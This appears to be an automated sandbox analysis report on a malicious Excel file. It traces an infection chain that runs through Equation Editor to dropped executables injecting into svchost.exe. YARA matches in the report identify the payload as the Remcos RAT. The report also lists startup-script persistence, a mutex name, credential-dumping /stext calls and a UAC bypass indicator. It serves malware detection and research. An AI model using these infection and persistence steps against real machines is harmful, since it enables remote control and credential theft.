OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00401E65 appears 35 times
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: String function: 00A0F9F2 appears 40 times
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: String function: 009F9CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: String function: 00A10A30 appears 46 times
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: String function: 00D49CB3 appears 31 times
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: String function: 00D60A30 appears 46 times
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: String function: 00D5F9F2 appears 40 times

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: bhvA870.tmp.10.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/18@2/3

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A637B5 GetLastError,FormatMessageW,

3_2_00A637B5

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A510BF AdjustTokenPrivileges,CloseHandle,	3_2_00A510BF
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_00A516C3
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DA10BF AdjustTokenPrivileges,CloseHandle,	6_2_00DA10BF
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_00DA16C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	7_2_00417952

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

3_2_00A651CD

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

3_2_00A7A67C

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

3_2_00A6648E

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_009F42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

3_2_009F42A2

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_0041AA4A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$202404294766578200.xlam.xlsx

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7879.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"

Source: C:\Windows\SysWOW64\svchost.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 00000007.00000002.989099681.0000000002A50000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.827860178.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 202404294766578200.xlam.xlsx	ReversingLabs: Detection: 68%
Source: 202404294766578200.xlam.xlsx	Virustotal: Detection: 59%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
